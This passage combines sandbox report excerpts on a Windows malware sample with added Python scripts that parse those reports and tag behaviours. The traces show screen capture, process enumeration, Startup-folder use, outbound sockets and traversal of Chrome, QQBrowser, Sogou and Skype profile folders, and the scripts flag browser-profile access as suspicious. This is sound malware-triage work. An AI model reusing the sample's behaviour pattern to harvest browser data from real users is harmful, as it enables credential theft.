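from dataclasses import dataclass, field
from typing import List, Optional

# One report line: optional subcall prefix, api.module, optional (args), ref: addr.
LINE_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# (api, zero-based argument index) -> {value: name}; documented Win32/Winsock values.
ENUMS = {
    ("socket", 0): {2: "AF_INET"},
    ("socket", 1): {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},
    ("socket", 2): {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"},
    ("setsockopt", 1): {0xFFFF: "SOL_SOCKET"},
    ("setsockopt", 2): {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE", 0x0080: "SO_LINGER"},
    ("WSAIoctl", 1): {0x98000004: "SIO_KEEPALIVE_VALS"},
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                         4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"},
    ("SHGetSpecialFolderPathA", 2): {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA",
                                     0x23: "CSIDL_COMMON_APPDATA"},
    ("LocalAlloc", 0): {0x40: "LPTR"},
}
# Bit-flag arguments, decoded as an OR of names when every set bit is known.
FLAGS = {
    ("CreateFileA", 1): {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"},
    ("CreateFileA", 2): {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE"},
    ("CreateFileA", 5): {0x80: "FILE_ATTRIBUTE_NORMAL"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    callee: Optional[int] = None          # set for 'Part of subcall function' lines
    decoded: List[str] = field(default_factory=list)


def decode_arg(api: str, idx: int, raw: str, args: List[str]) -> str:
    """Readable form of one argument; '?' (unknown to the sandbox) and literals pass through."""
    if not re.fullmatch(r"[0-9A-Fa-f]{8}", raw) and not re.fullmatch(r"[0-9A-Fa-f]{4}", raw):
        return raw                       # '?', 'RegOpenKeyExA', 'ADVAPI32.dll', ...
    value = int(raw, 16)
    # setsockopt optname is only meaningful once the level is known to be SOL_SOCKET.
    if api == "setsockopt" and idx == 2 and not (len(args) > 1 and args[1].upper() == "0000FFFF"):
        return raw
    if value in ENUMS.get((api, idx), {}):
        return ENUMS[(api, idx)][value]
    if (api, idx) in FLAGS:
        table = FLAGS[(api, idx)]
        names = [name for bit, name in table.items() if value & bit]
        if names and value & ~sum(table) == 0:
            return "|".join(names)
    return raw


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for lines that are not API calls."""
    m = LINE_RE.search(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    call = ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                   int(m["callee"], 16) if m["callee"] else None)
    call.decoded = [decode_arg(call.api, i, a, args) for i, a in enumerate(args)]
    return call


def describe(call: ApiCall) -> str:
    where = f"{call.ref:08X}" + (f" (via {call.callee:08X})" if call.callee else "")
    return f"{call.api}({', '.join(call.decoded)}) @ {where}"


def summarize(calls: List[ApiCall]) -> List[str]:
    """Coarse behavioural tags for one function's decoded call set (example heuristics)."""
    names = {c.api for c in calls}
    flat = [d for c in calls for d in c.decoded]
    tags = []
    if {"socket", "connect"} <= names:
        tags.append("outbound TCP client")
        if "SO_KEEPALIVE" in flat or "SIO_KEEPALIVE_VALS" in flat:
            tags.append("keepalive tuned for a long-lived session")
    if {"CreateFileA", "WriteFile"} <= names and "GENERIC_WRITE" in flat:
        tags.append("writes a file to disk")
    if "CreateProcessA" in names:
        tags.append("spawns a process")
    return tags


# Sample input copied from the socket and file-write function listings in the report.
SOCKET_FUNC = """
• Part of subcall function 0624180D: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
• Part of subcall function 0624180D: closesocket.WS2_32(?), ref: 06241850
• socket.WS2_32(00000002,00000001,00000006), ref: 06241460
• gethostbyname.WS2_32(?), ref: 06241471
• connect.WS2_32(?,00000002,00000010), ref: 062414A3
• setsockopt.WS2_32(?,0000FFFF,00000008,00000000,00000004), ref: 062414C8
• WSAIoctl.WS2_32(?,98000004,00000000,0000000C,00000000,00000000,?,00000000,00000000), ref: 062414F9
""".strip().splitlines()
DROP_FUNC = """
• CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?), ref: 0624420B
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 0624422E
• wsprintfA.USER32 ref: 06244271
""".strip().splitlines()

if __name__ == "__main__":
    for block in (SOCKET_FUNC, DROP_FUNC):
        calls = [c for c in map(parse_line, block) if c]
        print("\n".join(describe(c) for c in calls), "\n  ->", summarize(calls), "\n")
```

Run as a script it prints each call with named constants and a tag list per function; fed the full "APIs" column of a report it gives a quick first pass over hundreds of recovered functions. Arguments printed as "?" were not resolvable at analysis time and stay as they are, and an argument is only decoded when the table knows every bit, so an unfamiliar value is never silently relabelled.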
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,001D23D4,?,5EE195CD,?,001E110E,000000FF,001ED604,001D23D4,00000000), ref: 001E10C2
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                    • Opcode ID: 7ad8c3b3bd875214edd249dbd8ecc3ddd2d5821ddb8cc76e7497f24881adda6b
                                                                                                                    • Instruction ID: efc59df39accf8c5a5424945236669617cb3f13c668dfecf3dec2082b25f7963
                                                                                                                    • Opcode Fuzzy Hash: 7ad8c3b3bd875214edd249dbd8ecc3ddd2d5821ddb8cc76e7497f24881adda6b
                                                                                                                    • Instruction Fuzzy Hash: 0721E472E01BD0BBC7229B62EC84A6F3BA9DB517A0F250214F905A7291D770EDC0CAD0
APIs
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 06253FD2
• GetSystemMetrics.USER32(00000000), ref: 06253FEA
• GetSystemMetrics.USER32(00000001), ref: 06253FF1
• lstrcpyA.KERNEL32(?,DISPLAY), ref: 06254015
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: System$Metrics$InfoParameterslstrcpy
• String ID: B$DISPLAY
• API String ID: 1409579217-3316187204
• Opcode ID: 82bf76f7fcf4d4c0f0c10b2f1f952f186cdf425906fb78d94d6afc076093acdf
• Instruction ID: 3c41a306c2dd5ff23e738ecf45f9e26f6b57e7aa425e2b5d5386d921c439ebb0
• Opcode Fuzzy Hash: 82bf76f7fcf4d4c0f0c10b2f1f952f186cdf425906fb78d94d6afc076093acdf
• Instruction Fuzzy Hash: 9C110671910320AFDB61AF64DC88A9BBFE8EF18741B124052ED059E046D7B1D580CBA0
APIs
• __EH_prolog.LIBCMT ref: 0624479B
  • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
  • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
  • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 062447C9
  • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
  • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
  • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
  • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
• Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06244825
  • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
  • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
  • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
• String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
• API String ID: 12226711-2559963756
• Opcode ID: c26f003b2de82292947f24b67518856f20ed1b8d9e3fa1e5ccbc4dd429692b9b
• Instruction ID: ce019919bf23c7ba5ac6967f05b627e92d7046d8170e48666a036488f8dbf37c
• Opcode Fuzzy Hash: c26f003b2de82292947f24b67518856f20ed1b8d9e3fa1e5ccbc4dd429692b9b
• Instruction Fuzzy Hash: C211D671D60319EADB95EBE0DC46FEE77B8AF14700F100155BE21B20C0DBB85B088B61
APIs
• __EH_prolog.LIBCMT ref: 06244A22
  • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
  • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
  • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06244A50
  • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
  • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
  • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
  • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
• Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?), ref: 06244AAC
  • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
  • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
  • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
Strings
• C:\Users\, xrefs: 06244A7D
• QQBrowser.exe, xrefs: 06244A33
• \AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 06244A88
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
• String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
• API String ID: 12226711-2662846904
• Opcode ID: 97c15049b0f8a38463929f73a10a399a66d660bbb9325b12168ac44960bb771c
• Instruction ID: e16dd1b8a72b8a03c33c0ad14b025166cd137680e3d013c3b404fc722c693103
• Opcode Fuzzy Hash: 97c15049b0f8a38463929f73a10a399a66d660bbb9325b12168ac44960bb771c
• Instruction Fuzzy Hash: F8118E71960219AADBA5EBE0DD46FEEB7B8AF14300F114155FE21B21C0DBB85B488A61
APIs
• __EH_prolog.LIBCMT ref: 06244AE8
  • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
  • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
  • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06244B16
  • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
  • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
  • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
  • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
• Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?), ref: 06244B72
  • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
  • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
  • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
• Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
Yara matches
Similarity
• API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
• String ID: C:\Users\$SogouExplorer.exe$\AppData\Roaming\SogouExplorer
• API String ID: 12226711-2055279553
• Opcode ID: cb0c5c92778738459887c96575890a903a466eafe2fe71b03bcb17fd2eead325
• Instruction ID: 3fee9f5b9eea5c9868e837fc55210da5b47143dddb93306cb1e54fd493f201c8
• Opcode Fuzzy Hash: cb0c5c92778738459887c96575890a903a466eafe2fe71b03bcb17fd2eead325
• Instruction Fuzzy Hash: 5E11BE71960329EADBA5EBE0DC46FEEB7B8AF14300F100115BE21B20C0DBB85B048A61
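The function blocks above record two behaviours worth pulling out of the report mechanically rather than by reading: the screen-capture prologue (SystemParametersInfoA with SPI 0x30, GetSystemMetrics for SM_CXSCREEN/SM_CYSCREEN, and the "DISPLAY" device name), and three near-identical routines that snapshot the process list with CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS), resolve a folder with SHGetSpecialFolderPathA(CSIDL 7, the per-user Startup folder), sleep one second and then walk a browser profile directory (Chrome, QQBrowser, SogouExplorer) with FindFirstFileA/FindNextFileA. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses an excerpt constructed in this report's per-function layout (values copied from the blocks above), collects each function's API calls, strings and instruction fuzzy hash, and tags capabilities. The tag names, the browser-profile marker substrings and the API/string combinations chosen as triggers are my own assumptions; the TH32CS_SNAPPROCESS and CSIDL_STARTUP values are the documented Windows SDK constants.

```python
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Windows SDK constants used to interpret the hex arguments in the trace.
TH32CS_SNAPPROCESS = 0x2   # CreateToolhelp32Snapshot: snapshot the process list
CSIDL_STARTUP = 0x7        # SHGetSpecialFolderPathA: per-user Startup folder
# Assumed marker substrings for browser profile directories (my choice; extend as needed).
BROWSER_PROFILE_MARKERS = (r"\Google\Chrome\User Data", r"\Tencent\QQBrowser\User Data", r"\SogouExplorer")

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)")
XREF_RE = re.compile(r"^•\s*(.*?), xrefs: [0-9A-Fa-f]+$")

# Constructed excerpt in the report's per-function layout (two functions, trimmed).
SAMPLE_REPORT = r"""
APIs
• SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 06253FD2
• GetSystemMetrics.USER32(00000000), ref: 06253FEA
• GetSystemMetrics.USER32(00000001), ref: 06253FF1
• lstrcpyA.KERNEL32(?,DISPLAY), ref: 06254015
Strings
Memory Dump Source
• Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
Similarity
• API ID: System$Metrics$InfoParameterslstrcpy
• String ID: B$DISPLAY
• Instruction Fuzzy Hash: 9C110671910320AFDB61AF64DC88A9BBFE8EF18741B124052ED059E046D7B1D580CBA0
APIs
• __EH_prolog.LIBCMT ref: 06244A22
  • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
  • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
• SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06244A50
• Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,?,C:\Users\,?), ref: 06244AAC
  • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
  • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
Strings
• C:\Users\, xrefs: 06244A7D
• QQBrowser.exe, xrefs: 06244A33
• \AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 06244A88
Similarity
• String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
• Instruction Fuzzy Hash: F8118E71960219AADBA5EBE0DD46FEEB7B8AF14300F114155FE21B21C0DBB85B488A61
"""


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: str


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: set[str] = field(default_factory=set)
    fuzzy_hash: str | None = None
    tags: set[str] = field(default_factory=set)


def _hex(s: str) -> int | None:
    """Parse a hex argument; '?' and other unresolved arguments yield None."""
    return int(s, 16) if re.fullmatch(r"[0-9A-Fa-f]+", s) else None


def tag_capabilities(block: FunctionBlock) -> set[str]:
    """Map API/string combinations to coarse behaviour tags (tag names and triggers are my own)."""
    tags: set[str] = set()
    names = {a.name for a in block.apis}
    texts = set(block.strings) | {arg for a in block.apis for arg in a.args}
    if any(m in t for t in texts for m in BROWSER_PROFILE_MARKERS) and {"FindFirstFileA", "FindNextFileA"} & names:
        tags.add("browser-profile-access")
    if "GetSystemMetrics" in names and "DISPLAY" in texts:
        tags.add("screen-capture-setup")   # screen size plus the "DISPLAY" DC name precedes a capture
    for a in block.apis:
        flags = _hex(a.args[0]) if a.args else None
        if a.name == "CreateToolhelp32Snapshot" and flags is not None and flags & TH32CS_SNAPPROCESS:
            tags.add("process-enumeration")
        if a.name == "SHGetSpecialFolderPathA" and len(a.args) > 2 and _hex(a.args[2]) == CSIDL_STARTUP:
            tags.add("startup-folder-lookup")
    return tags


def parse_report(text: str) -> list[FunctionBlock]:
    """Split report text into per-function blocks; every 'APIs' header starts a new block."""
    blocks: list[FunctionBlock] = []
    cur: FunctionBlock | None = None
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            if section == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            continue
        if cur is None or not line:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            name, module, args, ref = m.groups()
            cur.apis.append(ApiCall(name, module, tuple(args.split(",")) if args else (), ref))
        elif section == "Strings" and (m := XREF_RE.match(line)):
            cur.strings.add(m.group(1))
        elif section == "Similarity":
            label, _, value = line.partition(":")      # first colon ends the field label
            label = label.lstrip("• ").strip()
            if label == "String ID":                   # '$'-joined string set, present even when Strings is empty
                cur.strings.update(s for s in value.strip().split("$") if s)
            elif label == "Instruction Fuzzy Hash":
                cur.fuzzy_hash = value.strip()
    for b in blocks:
        b.tags = tag_capabilities(b)
    return blocks


def summarize(text: str) -> list[dict]:
    """One triage row per function: fuzzy hash for cross-sample matching, API sequence, tags."""
    return [{"fuzzy_hash": b.fuzzy_hash, "apis": [a.name for a in b.apis], "tags": sorted(b.tags)}
            for b in parse_report(text)]


if __name__ == "__main__":
    for row in summarize(SAMPLE_REPORT):
        print(row)
```

Run against the full report text instead of SAMPLE_REPORT to get one row per function; the "String ID" field is read as well as the Strings section because, as in the Chrome block above, the Strings section is sometimes empty while the Similarity data still lists the referenced strings. The instruction fuzzy hash is kept in each row so that the same routine can be looked for in other samples' reports.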
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06244BAE
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06244BDC
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06244C38
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
                                                                                                                    • String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
                                                                                                                    • API String ID: 12226711-2559963756
                                                                                                                    • Opcode ID: a72105e49ef130c93663f9e02d26cc0a21366e3381c791a27b22faaeb66ffb2c
                                                                                                                    • Instruction ID: db267c7c8934a3d963e6d64ffa5cfa2eab2523abceaffb21fc70dd99d55dbe30
                                                                                                                    • Opcode Fuzzy Hash: a72105e49ef130c93663f9e02d26cc0a21366e3381c791a27b22faaeb66ffb2c
                                                                                                                    • Instruction Fuzzy Hash: 1D11B471D60319EADB95EBE0DC46FEE77B8AF14300F100155BE21B20C0DBB85B088A61
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 06244861
                                                                                                                      • Part of subcall function 06243441: __EH_prolog.LIBCMT ref: 06243446
                                                                                                                      • Part of subcall function 06243441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0624345C
                                                                                                                      • Part of subcall function 06243441: Process32First.KERNEL32(00000000,?), ref: 06243475
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 0624488F
                                                                                                                      • Part of subcall function 062587FB: lstrlenA.KERNEL32(?), ref: 0625883F
                                                                                                                      • Part of subcall function 06258633: __EH_prolog.LIBCMT ref: 06258638
                                                                                                                      • Part of subcall function 062585BF: __EH_prolog.LIBCMT ref: 062585C4
                                                                                                                      • Part of subcall function 062584B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 062584C5
                                                                                                                    • Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\Microsoft\Skype for Desktop,?,C:\Users\,?), ref: 062448EB
                                                                                                                      • Part of subcall function 06242E2C: __EH_prolog.LIBCMT ref: 06242E31
                                                                                                                      • Part of subcall function 06242E2C: FindFirstFileA.KERNEL32(?,?), ref: 06242EBF
                                                                                                                      • Part of subcall function 06242E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06242F7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
